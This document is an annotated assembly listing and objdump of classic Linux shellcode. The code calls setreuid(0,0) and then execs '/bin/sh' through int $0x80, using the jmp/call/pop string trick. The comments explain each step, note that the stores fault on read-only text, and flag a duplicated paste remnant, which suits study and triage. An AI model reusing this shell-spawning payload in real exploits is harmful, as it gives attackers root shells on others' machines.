  1. .section .data
  2. .section .text
  3. .globl _start
  4.  
     # Entry point of a standalone ELF (no libc).  AT&T/GAS syntax; the
     # objdump below shows 64-bit encodings, yet every kernel request goes
     # through the legacy `int $0x80` gate rather than `syscall`.  On x86-64
     # Linux that gate dispatches to the 32-bit compatibility table (where
     # 70 = setreuid and 11 = execve) and reads arguments from ebx/ecx/edx.
     # Register roles: rax = syscall number (set via %al), rbx/rcx/rdx =
     # argument registers, rbx = address of the "/bin/sh" bytes once
     # `starter` has run.
     # Note: comments here use `#`; in x86 GAS `;` is a statement separator,
     # not a comment marker.
  5. _start:
  6. xor %rax, %rax
  7. mov $70, %al
  8. xor %rbx, %rbx
  9. xor %rcx, %rcx
     # rax = 70 (0x46 in the objdump), rbx = rcx = 0 -- the author's annotated
     # copy labels this sys_setreuid(0,0).  rdx is not initialised here.
  10. int $0x80
  11.  
     # jmp / call / pop idiom: `call starter` pushes the address of the bytes
     # that follow it, i.e. the "/bin/sh" string, and `pop %rbx` recovers it.
     # This position-independent string fetch is a well-known pattern worth
     # keying on when triaging unknown code.
  12. jmp ender
  13.  
  14. starter:
     # rbx = &"/bin/sh" (the return address pushed by `call starter`).
  15. pop %rbx
  16. xor %rax, %rax
     # Stores a NUL at string+7.  `.string` already emits a terminating NUL,
     # and the target lies in .text; the author's annotated copy notes that
     # this write faults because the page is mapped read-only.
  17. mov %al, 0x07(%rbx)
     # string+8  : 8-byte copy of the string address.
     # string+12 : 8-byte zero.  The two stores overlap (bytes 12-15 of the
     #             pointer are overwritten), leaving string+8..11 = low half
     #             of the pointer and string+12..19 = zero.  Both stores also
     #             target the same read-only page as the NUL store above.
  18. mov %rbx, 0x08(%rbx)
  19. mov %rax, 0x0c(%rbx)
     # rax = 11 (0x0b); rcx = string+8, rdx = string+12.  The annotated copy
     # labels this sys_execve: ebx = path, ecx = argv, edx = envp.
  20. mov $11, %al
  21. lea 0x08(%rbx), %rcx
  22. lea 0x0c(%rbx), %rdx
  23. int $0x80
     # No exit path: if the syscall returns, execution falls through into
     # `ender`, calls `starter` again and repeats (see the author's note in
     # the annotated copy).
  24.  
  25. ender:
  26. call starter
     # NUL-terminated string data placed inline in .text; the objdump below
     # shows these bytes decoded as meaningless instructions ("(bad)").
  27. .string "/bin/sh"
  28.  
  29. 0000000000400078 <_start>:
  30. 400078: 48 31 c0 xor %rax,%rax
  31. 40007b: b0 46 mov $0x46,%al
  32. 40007d: 48 31 db xor %rbx,%rbx
  33. 400080: 48 31 c9 xor %rcx,%rcx
  34. 400083: cd 80 int $0x80
  35. 400085: eb 1b jmp 4000a2 <ender>
  36.  
  37. 0000000000400087 <starter>:
  38. 400087: 5b pop %rbx
  39. 400088: 48 31 c0 xor %rax,%rax
  40. 40008b: 88 43 07 mov %al,0x7(%rbx)
  41. 40008e: 48 89 5b 08 mov %rbx,0x8(%rbx)
  42. 400092: 48 89 43 0c mov %rax,0xc(%rbx)
  43. 400096: b0 0b mov $0xb,%al
  44. 400098: 48 8d 4b 08 lea 0x8(%rbx),%rcx
  45. 40009c: 48 8d 53 0c lea 0xc(%rbx),%rdx
  46. 4000a0: cd 80 int $0x80
  47.  
  48. 00000000004000a2 <ender>:
  49. 4000a2: e8 e0 ff ff ff callq 400087 <starter>
  50. 4000a7: 2f (bad)
  51. 4000a8: 62 (bad)
  52. 4000a9: 69 .byte 0x69
  53. 4000aa: 6e outsb %ds:(%rsi),(%dx)
  54. 4000ab: 2f (bad)
  55. 4000ac: 73 68 jae 400116 <ender+0x74>
  56.  
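  57. .section .data
  58. .section .text
  59. .globl _start
  60.  
     # Annotated copy of the listing above.  Comment lines now use `#`: in
     # x86 GAS `;` is a statement separator, so the original `; ...` lines
     # were parsed as instructions (e.g. `call sys_setreuid(0,0)`) and would
     # stop the assembler.  AT&T syntax, 64-bit build, legacy `int $0x80`
     # gate throughout; on x86-64 Linux that gate dispatches to the 32-bit
     # compatibility table (70 = setreuid, 11 = execve) with arguments taken
     # from ebx/ecx/edx.
  61. _start:
  62. xor %rax, %rax
  63. mov $70, %al
  64. xor %rbx, %rbx
  65. xor %rcx, %rcx
  66. # call sys_setreuid(0,0): rax = 70, rbx = rcx = 0 (rdx is left as-is)
  67. int $0x80
  68.  
     # jmp / call / pop idiom: the call in `ender` pushes the address of the
     # "/bin/sh" bytes that follow it.
  69. jmp ender
  70.  
  71. starter:
  72. # take the return address off the stack:
  73. # rbx now points to the "/bin/sh" string placed after the call instruction
  74. pop %rbx
  75. # zero rax
  76. xor %rax, %rax
  77. # store a zero byte at string+7 ("/bin/sh" is 7 characters; `.string`
  77. # already appends a NUL, so this write is redundant).
  78. # It faults here: the string lives in .text, which is mapped read-only.
  79. mov %al, 0x07(%rbx)
  80. # ...then the string address at string+8 (8 bytes)...
  81. mov %rbx, 0x08(%rbx)
  82. # ...then an 8-byte zero at string+12.  This overlaps bytes 12-15 of the
  82. # pointer just stored, so string+8..11 holds the low half of the pointer
  82. # and string+12..19 is zero.  Same read-only page as the store above.
  83. mov %rax, 0x0c(%rbx)
  84. # set up the sys_execve call: rax = 11, rbx = path, rcx = string+8 (argv),
  84. # rdx = string+12 (envp)
  85. mov $11, %al
  86. lea 0x08(%rbx), %rcx
  87. lea 0x0c(%rbx), %rdx
  88. int $0x80
  89.  
  90. # What happens when int $0x80 returns?  Execution falls through into
  90. # `ender`, so `starter` is called again and the sequence repeats.
  91. # There is no exit path here.
  92.  
  93. ender:
  94. call starter
     # NUL-terminated string data inline in .text (decoded as "(bad)" bytes
     # in the objdump above).
  95. .string "/bin/sh"
  96.  
     # The two instructions below sit after the string data and duplicate
     # lines 81 and 83; they look like a paste remnant and are not reached by
     # the visible control flow (`starter` never returns via `ret`).
  97. mov %rbx, 0x08(%rbx)
  98. mov %rax, 0x0c(%rbx)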